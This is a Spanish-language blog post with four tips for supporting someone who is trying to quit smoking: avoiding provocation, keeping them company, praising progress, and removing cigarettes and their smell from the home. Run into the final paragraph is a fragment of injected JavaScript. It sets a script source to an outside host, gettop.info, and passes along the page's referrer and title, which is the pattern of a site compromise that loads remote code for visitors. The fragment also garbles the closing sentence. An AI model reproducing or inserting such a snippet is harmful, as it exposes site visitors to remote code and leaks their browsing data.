Salud y belleza » Salud

Tabaquismo en tercera persona

Sin Comentarios

Si bien es una realidad que la decisión de abandonar un vicio como el tabaquismo siempre debe partir del protagonista, nunca se debe subestimar el papel que juegan los más cercanos. Son muchas las formas mediante las cuales se puede brindar ayuda a una persona que lucha contra el cigarrillo. El soporte y el apoyo son factores determinantes para ayudar a alguien salir ante una enfermedad de ese tipo. Para cumplir dicha tarea solidaria de forma efectiva, es necesario saber cuáles son las herramientas que podemos aportar desde nuestra posición.

  • No provocar. Aquellos que observan la situación desde afuera, tienden a subestimar el efecto adictivo que causa el tabaco en el resto de las personas. Se debe reconocer, aún desde la ignorancia, el poder y la influencia que ejerce el cigarrillo en cualquier adicto y, en base a eso, sí sugerir, pero no provocar al enfermo. Así, si éste quiere tomar un cigarrillo, es posible lanzar frases como “¿por qué no esperas un ratito más?” o “después fumas, guárdalo para más tarde”. Los comentarios no deben ser agresivos pues, de esa forma, solo se conseguirá la ira (o frustración) del adicto que, en definitiva, fumará por culpa de ese estrés (o, incluso, lo hará a escondidas, algo que tampoco sirve realmente).
  • Acompañar y servir de soporte. Por supuesto, siempre se debe estar al lado de la persona fumadora y, amén de hacerle saber sus errores, también es muy importante acompañarlo en todo momento. Las muestras de afecto o los métodos de distracción, siempre son útiles. Acompañarlo a caminar, al gimnasio, a los chequeos médicos y demás resulta indispensable.
  • Aplaudir y reconocer el esfuerzo. “¡Llevas una semana sin fumar!”, “¿Te das cuenta que cuando te propones algo, siempre lo consigues?”. Frases como éstas pueden significar una gran motivación para el fumador que está intentando deshacerse del vicio. Así, siempre sirve repetir (siempre y cuando la situación lo amerite) palabras de aliento. Recordemos que todos los individuos necesitan un pequeño “abrazo o caricia”, literal o no, para llevar a cabo una empresa de ese tipo.
  • Ambientar el hogar. Intenta deshacerte de todos los cigarrillos (al menos los que están dando vueltas por el hogar) y también los ceniceros. Evita dejar a mano cualquier recuerdo de los cigarrillos y, más aún, utiliza productos de lavandería o perfumes para deshacer cualquier olor similar al del tabaco en el hogar.

Solo cuatro simples consejos (aunque por supuesto que hay muchos más) bastan para ayudar a un fumador a acabar con sus vicios. Es necesario apoyarlo, acompañarlo, motivarlo y reconocerlo desde nuestro humilde papel: le haremos un gran bien.s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , , , , , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.